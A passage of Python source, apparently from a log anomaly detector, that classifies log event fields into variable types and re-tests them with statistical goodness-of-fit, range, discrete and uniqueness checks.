sort_list.append(distribution[i]) return distribution[sort_indices[0]] + [sort_list] if self.use_empiric_distr: return ['emp', ev, sigma, []] # discrete if no distribution fits return ['d'] def calculate_value_range(self, values): """Calculate the lower and upper limit of the expected values through the mean and standard deviation of the given values.""" if self.used_range_test == 'MeanSD': # Calculate the mean and standard deviation of the test sample [ev, sigma] = norm.fit(values) # Estimate distance of the mean ot the limits with the quantiles of the normal distribution. ev_dist = sigma * norm.ppf(self.range_alpha / 2) # Calculate lower and upper limit lower_limit = ev + ev_dist * self.range_limits_factor upper_limit = ev - ev_dist * self.range_limits_factor elif self.used_range_test == 'EmpiricQuantiles': # Sort values values.sort() # Calculate lower and upper limit lower_limit = values[0] - (values[int(len(values) * (0.5 - self.range_alpha / 2) + 0.5)] - values[0]) * self.range_limits_factor upper_limit = values[-1] - ( values[-1 - int(len(values) * (0.5 - self.range_alpha / 2) + 0.5)] - values[-1]) * self.range_limits_factor else: # self.used_range_test == 'MinMax' # Sort values values.sort() # Calculate lower and upper limit lower_limit = values[0] - (values[-1] - values[0]) * (0.5 - self.range_alpha / 2) * self.range_limits_factor upper_limit = values[-1] + (values[-1] - values[0]) * (0.5 - self.range_alpha / 2) * self.range_limits_factor return ['range', lower_limit, upper_limit, 0] def update_var_type(self, event_index, var_index, log_atom): """Test if the new num_update values fit the detected var type and updates the var type if the test fails.""" # Getting the new values and saving the old distribution for printing-purposes if the test fails new_values = self.event_type_detector.values[event_index][var_index][-self.num_update:] VT_old = copy.deepcopy(self.var_type[event_index][var_index]) # Test and update for continuous distribution if self.var_type[event_index][var_index][0] in self.distr_list: if not consists_of_floats(new_values): # A value is not a float or integer, so the new assigned type is others # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.distr_val[event_index][var_index] = [] self.bt_results[event_index][var_index] = [] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom, 1.0) return # first_distr is used to test the current distribution with the BT and to discard the alternative distributions if they # fail the s_gof-test once first_distr = True s_gof_result = self.s_gof_test(event_index, var_index, first_distr) # Calculate the confidence as the stretched sigmaoid function of the maximal value of the step fct # 1 / (1 + np.exp(-2)) = 1.1353352832366128 confidence = 1 / (1 + np.exp(-2 * s_gof_result[1])) * 1.1353352832366128 while not s_gof_result[0]: # If the test fails a new shape is searched for in the alternative distributions self.bt_results[event_index][var_index] = self.bt_results[event_index][var_index][1:] + [0] # Update the results of the BT first_distr = False # Check if the BT is applicable and if it holds if first_distr and (sum(self.bt_results[event_index][var_index]) >= self.s_gof_bt_min_success): return if not self.learn_mode: # Do not update variable type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return if len(self.alternative_distribution_types[event_index][var_index]) != 0: # There is at least one alternative distribution # Initializes the distributionvalues and bucketnumbers self.var_type[event_index][var_index] = self.alternative_distribution_types[event_index][var_index][0] self.alternative_distribution_types[event_index][var_index] = self.alternative_distribution_types[event_index][ var_index][1:] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) s_gof_result = self.s_gof_test(event_index, var_index, first_distr) # There is no alternative distribution. The var type is set to others else: # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.distr_val[event_index][var_index] = [] self.bt_results[event_index][var_index] = [] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom, confidence) return # Check if the s_gof_test was successful and remark the success if first_distr: self.bt_results[event_index][var_index] = self.bt_results[event_index][var_index][1:] + [1] # Print a message if the vartype has changed if VT_old != self.var_type[event_index][var_index]: self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom, confidence) # Test and update if the values are in the specified range elif self.var_type[event_index][var_index][0] == 'range': self.var_type[event_index][var_index][3] += 1 # Check if the sum of distances of all values outside the defined limits is greater than range_threshold times the range of # the limits if sum(max(0, val - self.var_type[event_index][var_index][2]) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) +\ sum(max(0, self.var_type[event_index][var_index][1] - val) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) >\ self.range_threshold * (self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) # Reset counter if at least one value lies outside of the limits elif any(max(0, val - self.var_type[event_index][var_index][2]) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) or\ any(max(0, self.var_type[event_index][var_index][1] - val) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]): self.var_type[event_index][var_index][3] = 1 # Reinitialize the range limits if no value was outside of the range in the last num_reinit_range update steps elif self.learn_mode and self.num_reinit_range != 0 and\ self.var_type[event_index][var_index][3] % self.num_reinit_range == 0: self.var_type[event_index][var_index] = self.calculate_value_range( self.event_type_detector.values[event_index][var_index][-self.num_update:]) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Test and update for ascending values elif self.var_type[event_index][var_index][0] == 'asc': # Search for a not ascending sequence in the values for j in range(-self.num_update, 0): if self.event_type_detector.values[event_index][var_index][j - 1] >\ self.event_type_detector.values[event_index][var_index][j]: # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return elif self.var_type[event_index][var_index][0] == 'desc': # Test and update for descending values for j in range(-self.num_update, 0): # Search for a not ascending sequence in the values if self.event_type_detector.values[event_index][var_index][j - 1] <\ self.event_type_detector.values[event_index][var_index][j]: if not self.learn_mode: # Do not update variable type self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return elif self.var_type[event_index][var_index][0] == 'd': # Test and update for values of the discrete type # Check if new values have appeared if len(set(new_values + self.var_type[event_index][var_index][1])) > len(self.var_type[event_index][var_index][1]): # New values have appeared # Test if vartype others if len(set(new_values + self.var_type[event_index][var_index][1])) >= ( self.num_update + self.var_type[event_index][var_index][3]) * (1 - self.sim_thres): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][2][1][-1] = 1 return # Create the new value-set and expands the occurrence-list for the new values new_values_set = list(set(self.event_type_detector.values[event_index][var_index][-self.num_update:])) for val in new_values_set: if val not in self.var_type[event_index][var_index][1]: self.var_type[event_index][var_index][1].append(val) self.var_type[event_index][var_index][2].append(0) # update the occurrences # List for the appearances of the new values values_app = [0] * len(self.var_type[event_index][var_index][1]) for i in range(-self.num_update, 0): values_app[self.var_type[event_index][var_index][1].index( self.event_type_detector.values[event_index][var_index][i])] += 1 tmp_number = self.var_type[event_index][var_index][3] / ( self.num_update + self.var_type[event_index][var_index][3]) # Updates the appearance-list in the var type of the discrete variable for j, val in enumerate(self.var_type[event_index][var_index][2]): self.var_type[event_index][var_index][2][j] = \ val * tmp_number + values_app[j] / (self.num_update + self.var_type[event_index][var_index][3]) self.var_type[event_index][var_index][3] = self.num_update + self.var_type[event_index][var_index][3] self.d_init_bt(event_index, var_index) self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][2][1][-1] = 1 return # No new values have appeared, so the normal test for discrete variables is used self.d_test(event_index, var_index) # Check if the values should be considered others or if the BT failed if (len(set(new_values + self.var_type[event_index][var_index][1])) >= ( self.num_update + self.var_type[event_index][var_index][3]) * (1 - self.sim_thres)) or (sum( self.bt_results[event_index][var_index][0]) < self.d_bt_min_success): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.bt_results[event_index][var_index][0] = [1] * self.num_d_bt self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Update the probabilities of the discrete values if self.learn_mode and self.bt_results[event_index][var_index][0][-1]: # List for the number of appearance of the values values_app = [0 for x in range(len(self.var_type[event_index][var_index][1]))] for val in new_values: values_app[self.var_type[event_index][var_index][1].index(val)] += 1 tmp_number = self.var_type[event_index][var_index][3] / ( self.num_update + self.var_type[event_index][var_index][3]) # Updates the appearance-list in the var type of the discrete variable for j, val in enumerate(self.var_type[event_index][var_index][2]): self.var_type[event_index][var_index][2][j] = \ val * tmp_number + values_app[j] / (self.num_update + self.var_type[event_index][var_index][3]) self.var_type[event_index][var_index][3] = self.num_update + self.var_type[event_index][var_index][3] # Check if the discrete distribution has to be updated if ((self.var_type[event_index][var_index][3] - self.num_init) % self.num_pause_discrete) == 0: self.d_init_bt(event_index, var_index) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) return # Test and update for static variables if self.var_type[event_index][var_index][0] == 'stat': # Check if still static if all(new_values[i] == self.event_type_detector.values[event_index][var_index][0] for i in range(self.num_update)): if self.var_type[event_index][var_index][2] and self.num_stat_stop_update is True and \ self.event_type_detector.num_event_lines[event_index] >= self.num_stat_stop_update: self.event_type_detector.check_variables[event_index][var_index] = False self.event_type_detector.values[event_index][var_index] = [] self.var_type[event_index][var_index] = [] self.var_type_history_list[event_index][var_index] = [] if len(self.var_type_history_list_reference) > event_index and len(self.var_type_history_list_reference[event_index]) >\ var_index: self.var_type_history_list_reference[event_index][var_index] = [] affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print(f'Stopped tracking the variable of event type {self.event_type_detector.get_event_type(event_index)} with' f' Path:\n{affected_path}\nbecause of its static values.', log_atom, affected_path, confidence=1 - 1 / self.num_stat_stop_update) return # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Check if new values appear to be of type others if len(set(new_values)) >= self.num_update * (1 - self.sim_thres) and self.num_update >= 3: # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Change the var type from static to discrete # list of the values values_set = list(set(self.event_type_detector.values[event_index][var_index][-self.num_init:])) # List to store the appearance of the values values_app = [0 for _ in range(len(values_set))] for j in range(-self.num_init, 0): values_app[values_set.index(self.event_type_detector.values[event_index][var_index][j])] += 1 values_app = [x / self.num_init for x in values_app] # Values follow a discrete pattern self.var_type[event_index][var_index] = ['d', values_set, values_app, self.num_init] self.d_init_bt(event_index, var_index) self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom) return # Test and update for unique values if self.var_type[event_index][var_index][0] == 'unq': # Check if the new values are not unique if len(set(self.event_type_detector.values[event_index][var_index][-self.num_update:])) != self.num_update: if not self.learn_mode: # Do not update variable type self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Check if one of the new values has appeared in the last self.num_update_unq values for j in self.event_type_detector.values[event_index][var_index][-self.num_update:]: if j in self.event_type_detector.values[event_index][var_index][ -self.num_update_unq - self.num_update:-self.num_update]: # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return return # Update for var type others if self.var_type[event_index][var_index][0] == 'others': # Do not update variable type if not self.learn_mode: return # Check if it has passed enough time, to check if the values have a new var_type if (self.var_type[event_index][var_index][1] + 1) % (self.num_pause_others + 1) == 0: # Added a exponential waiting time to avoid redundant tests if not consists_of_ints([np.log2((self.var_type[event_index][var_index][1] + 1) / (self.num_pause_others + 1))]): self.var_type[event_index][var_index][1] += 1 return # Checking for a new var_type vt_new = self.detect_var_type(event_index, var_index) # Only increase the number of skipped update-cycles if vt_new[0] == 'others': self.var_type[event_index][var_index][1] += 1 return # The variable gets assigned a new var_type # VarType is empiric distribution if vt_new[0] == 'emp': self.var_type[event_index][var_index] = vt_new self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif vt_new[0] in self.distr_list: self.var_type[event_index][var_index] = vt_new[:-1] self.alternative_distribution_types[event_index][var_index] = vt_new[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # VarType is discrete elif vt_new[0] == 'd': self.var_type[event_index][var_index] = vt_new self.d_init_bt(event_index, var_index) else: self.var_type[event_index][var_index] = vt_new self.print_changed_var_type(event_index, ['others'], vt_new, var_index, log_atom) else: self.var_type[event_index][var_index][1] += 1 def s_gof_get_quantiles(self, event_index, var_index): """Generate the needed quantiles of the distribution for the sliding gof-test.""" if self.var_type[event_index][var_index][0] == 'emp': # Get a list of almost equidistant indices indices = [int(i) for i in [self.num_init * j / (2 * self.num_s_gof_values) for j in range(2 * self.num_s_gof_values)]] # Get the list of values and sort them sorted_values = copy.copy(self.event_type_detector.values[event_index][var_index][-self.num_init:]) sorted_values.sort() # Generate the list of distribution values distr_val = [] for index in indices: distr_val.append(sorted_values[index]) self.distr_val[event_index][var_index] = distr_val return # Calculate the quantiles of the special distribution if self.var_type[event_index][var_index][0] == 'spec': ev = self.var_type[event_index][var_index][1] sigma = self.var_type[event_index][var_index][2] indices = 0 + np.array(range(2 * self.num_s_gof_values)) / (2 * self.num_s_gof_values - 1) * ( 1000 - 1) indices = indices.astype(int) # Generate the quantiles for the var type with the standardised quantiles self.distr_val[event_index][var_index] = self.quantiles['spec'][indices] * sigma + ev return # Calculate the quantiles of the mixed beta distribution if self.var_type[event_index][var_index][0] == 'betam': min_val = self.var_type[event_index][var_index][1] scale = self.var_type[event_index][var_index][2] proportion = self.var_type[event_index][var_index][5] indices1 = [int(round(i / proportion)) for i in range(int(round(1000 * proportion)))] indices2 = [i for i in range(1000) if i not in indices1] # Generate the quantiles for the var type with the standardised quantiles self.distr_val[event_index][var_index] = np.append( self.quantiles['betam1'][indices1] * scale + min_val, self.quantiles['betam2'][indices2] * scale + min_val) self.distr_val[event_index][var_index].sort() return def s_gof_test(self, event_index, var_index, first_distr): """Make a gof-test. @return a list with the first entry True/False and as the second entry the maximal value of the step functions """ num_distr_val = 2 * self.num_s_gof_values if self.used_gof_test == 'KS': # Calculate the critical value for the KS-test # The parameters are in the list of the critical values distribution = self.var_type[event_index][var_index][0] if distribution == 'beta': distribution += str(self.var_type[event_index][var_index][-1]) if self.s_gof_alpha in self.crit_val_upd_ks and self.num_init in self.crit_val_upd_ks[self.s_gof_alpha] \ and self.num_s_gof_values in self.crit_val_upd_ks[self.s_gof_alpha][self.num_init] \ and distribution in self.crit_val_upd_ks[self.s_gof_alpha][self.num_init][self.num_s_gof_values]: crit_value = \ self.crit_val_upd_ks[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution] else: crit_value = ((num_distr_val + self.num_s_gof_values) * (np.log(2 / self.s_gof_alpha)) / ( 2 * num_distr_val * self.num_s_gof_values)) ** (1 / 2) test_statistic = 0 # Scipy KS-test for uniformal distribution if self.var_type[event_index][var_index][0] == 'uni': test_statistic = kstest( self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'uniform', args=(self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]-self.var_type[event_index][ var_index][1]))[0] # Scipy KS-test for normal distribution elif self.var_type[event_index][var_index][0] == 'nor': test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'norm', args=( self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]))[0] # Scipy KS-test for beta distributions elif self.var_type[event_index][var_index][0] == 'beta': if self.var_type[event_index][var_index][5] == 1: test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 0.5, 0.5, self.var_type[event_index][var_index][3], self.var_type[event_index][var_index][4] - self.var_type[ event_index][var_index][3]))[0] elif self.var_type[event_index][var_index][5] == 2: # Mu and sigma of the desired distribution [mu, sigma] = [5 / (5 + 2), pow(5 * 2 / (5 + 2 + 1), 1 / 2) / (5 + 2)] test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 5, 2, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma, self.var_type[event_index][var_index][2] / sigma))[0] elif self.var_type[event_index][var_index][5] == 3: # Mu and sigma of the desired distribution [mu, sigma] = [2 / (5 + 2), pow(5 * 2 / (5 + 2 + 1), 1 / 2) / (5 + 2)] test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 2, 5, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma, self.var_type[event_index][var_index][2] / sigma))[0] elif self.var_type[event_index][var_index][5] == 4: # Mu and sigma of the desired distribution [mu, sigma] = [1 / (5 + 1), pow(5 * 1 / (5 + 1 + 1), 1 / 2) / (5 + 1)] test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 1, 5, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma, self.var_type[event_index][var_index][2] / sigma))[0] elif self.var_type[event_index][var_index][5] == 5: # Mu and sigma of the desired distribution [mu, sigma] = [5 / (5 + 1), pow(5 * 1 / (5 + 1 + 1), 1 / 2) / (5 + 1)] test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=( 5, 1, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma, self.var_type[event_index][var_index][2] / sigma))[0] else: test_statistic = ks_2samp(self.distr_val[event_index][var_index], self.event_type_detector.values[event_index][var_index][ -self.num_s_gof_values:])[0] if first_distr: if test_statistic > crit_value: return [False, test_statistic] return [True, test_statistic] if test_statistic > crit_value: return [False, 1.0] return [True, 0.0] # Else self.used_gof_test == 'CM' # Calculate the critical value for the CM-test # The parameters are in the list of the critical values distribution = self.var_type[event_index][var_index][0] if distribution == 'beta': distribution += str(self.var_type[event_index][var_index][-1]) if distribution in ['uni', 'nor', 'beta1']: crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution] elif distribution in ['beta2', 'beta3']: crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2'] elif distribution in ['beta4', 'beta5']: crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'] else: crit_value = self.crit_val_hom_cm[self.s_gof_alpha][max(self.num_init, self.num_s_gof_values)][ min(self.num_init, self.num_s_gof_values)] test_statistic = 0 # Two sample CM-test for uniformal distribution if self.var_type[event_index][var_index][0] == 'uni': min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) min_upd = min_val - self.min_mod_upd_uni / (1-self.min_mod_upd_uni-self.max_mod_upd_uni) * (max_val-min_val) max_upd = max_val + self.max_mod_upd_uni / (1-self.min_mod_upd_uni-self.max_mod_upd_uni) * (max_val-min_val) # Check if the estimated min and max differ more than the critical distance and return a negative test result if abs(self.var_type[event_index][var_index][1] - min_upd) / ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) +\ abs(self.var_type[event_index][var_index][2] - max_upd) / ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) >\ self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]: return [False, 1] estimated_min = min(self.var_type[event_index][var_index][1], min_upd) estimated_max = max(self.var_type[event_index][var_index][2], max_upd) test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (estimated_max - estimated_min), 'uniform') # Two sample CM-test for normal distribution elif self.var_type[event_index][var_index][0] == 'nor': test_statistic = cramervonmises(np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]), 'norm', args=(self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2])) # Two sample CM-test for beta distributions elif self.var_type[event_index][var_index][0] == 'beta': if self.var_type[event_index][var_index][5] == 1: min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) min_upd = min_val - self.min_mod_upd_beta1 / (1-self.min_mod_upd_beta1-self.max_mod_upd_beta1) * (max_val-min_val) max_upd = max_val + self.max_mod_upd_beta1 / (1-self.min_mod_upd_beta1-self.max_mod_upd_beta1) * (max_val-min_val) # Check if the estimated min and max differ more than the critical distance and return a negative test result if abs(self.var_type[event_index][var_index][3] - min_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\ abs(self.var_type[event_index][var_index][4] - max_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\ self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]: return [False, 1] estimated_min = min(self.var_type[event_index][var_index][3], min_upd) estimated_max = max(self.var_type[event_index][var_index][4], max_upd) test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (estimated_max - estimated_min), 'beta', args=(0.5, 0.5)) elif self.var_type[event_index][var_index][5] == 2: min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) min_upd = min_val - self.min_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val) max_upd = max_val + self.max_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val) # Check if the estimated min and max differ more than the critical distance and return a negative test result if abs(self.var_type[event_index][var_index][3] - min_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\ abs(self.var_type[event_index][var_index][4] - max_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\ self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']: return [False, 1] estimated_min = min(self.var_type[event_index][var_index][3], min_upd) estimated_max = max(self.var_type[event_index][var_index][4], max_upd) test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (estimated_max - estimated_min), 'beta', args=(5, 2)) elif self.var_type[event_index][var_index][5] == 3: min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) min_upd = min_val - self.max_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val) max_upd = max_val + self.min_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val) # Check if the estimated min and max differ more than the critical distance and return a negative test result if abs(self.var_type[event_index][var_index][3] - min_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\ abs(self.var_type[event_index][var_index][4] - max_upd) / ( self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\ self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']: return [False, 1] estimated_min = min(self.var_type[event_index][var_index][3], min_upd) estimated_max = max(self.var_type[event_index][var_index][4], max_upd) test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (estimated_max - estimated_min), 'beta', args=(2, 5)) elif self.var_type[event_index][var_index][5] == 4: ev_upd = (self.var_type[event_index][var_index][1] * self.num_init + np.mean( self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) * self.num_s_gof_values) / (self.num_init + self.num_s_gof_values) estimated_min = min(min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]), self.var_type[event_index][var_index][3]) # Check if the estimated min and max differ more than the critical distance and return a negative test result if (abs(min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - self.var_type[event_index][var_index][3]) > self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][0]) or ( max(ev_upd / self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][1] / ev_upd) > self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][1]): return [False, 1] test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_min) / (ev_upd-estimated_min) * (1 / (5 + 1)-self.min_mod_upd_beta4) + self.min_mod_upd_beta4, 'beta', args=(1, 5)) elif self.var_type[event_index][var_index][5] == 5: ev_upd = (self.var_type[event_index][var_index][1] * self.num_init + np.mean( self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) * self.num_s_gof_values) / (self.num_init + self.num_s_gof_values) estimated_max = max(max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]), self.var_type[event_index][var_index][4]) # Check if the estimated min and max differ more than the critical distance and return a negative test result if (abs(max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - self.var_type[event_index][var_index][4]) > self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][0]) or ( max(ev_upd / self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][1] / ev_upd) > self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][1]): return [False, 1] test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) - estimated_max) / (estimated_max - ev_upd) * (1 / (5 + 1)-self.min_mod_upd_beta4) + 1 - self.min_mod_upd_beta4, 'beta', args=(5, 1)) else: test_statistic = cramervonmises2(self.distr_val[event_index][var_index], self.event_type_detector.values[event_index][ var_index][-self.num_s_gof_values:]) if first_distr: if test_statistic > crit_value: return [False, test_statistic] return [True, test_statistic] if test_statistic > crit_value: return [False, 1.0] return [True, 0.0] def d_test(self, event_index, var_index): """Make a test if the new variables follow the discrete distribution and append the result to the BT.""" if self.used_multinomial_test == 'MT': # Count the appearance of the values values_app = [0] * len(self.var_type[event_index][var_index][1]) for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]: values_app[self.var_type[event_index][var_index][1].index(v)] += 1 # probability of the values or the test sample prob_of_sample = self.bt_results[event_index][var_index][1].pmf(values_app) # Sum of the probabilities, which are smaller than the probability of the values smaller_prob_sum = 0 if len(self.var_type[event_index][var_index][1]) <= 5: for a in range(self.num_update + 1): if len(self.var_type[event_index][var_index][1]) == 2: tmp_prob = self.bt_results[event_index][var_index][1].pmf([a, self.num_update - a]) if tmp_prob <= prob_of_sample: smaller_prob_sum += tmp_prob else: for b in range(self.num_update - a + 1): if len(self.var_type[event_index][var_index][1]) == 3: tmp_prob = self.bt_results[event_index][var_index][1].pmf([a, b, self.num_update - (a + b)]) if tmp_prob <= prob_of_sample: smaller_prob_sum += tmp_prob else: for c in range(self.num_update - (a + b) + 1): if len(self.var_type[event_index][var_index][1]) == 4: tmp_prob = self.bt_results[event_index][var_index][1].pmf( [a, b, c, self.num_update - (a + b + c)]) if tmp_prob <= prob_of_sample: smaller_prob_sum += tmp_prob else: for d in range(self.num_update - (a + b + c) + 1): tmp_prob = self.bt_results[event_index][var_index][1].pmf( [a, b, c, d, self.num_update - (a + b + c + d)]) if tmp_prob <= prob_of_sample: smaller_prob_sum += tmp_prob # Make a multinomial test if smaller_prob_sum < self.d_alpha: self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0] return self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1] return if self.used_multinomial_test == 'Chi': # Count the appearance of the values values_app = [0] * len(self.var_type[event_index][var_index][1]) for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]: values_app[self.var_type[event_index][var_index][1].index(v)] += 1 # Make a chisquare test if chisquare(values_app, f_exp=[i * self.num_update for i in self.var_type[event_index][var_index][2]])[1] < \ self.d_alpha: self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0] return self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1] return # 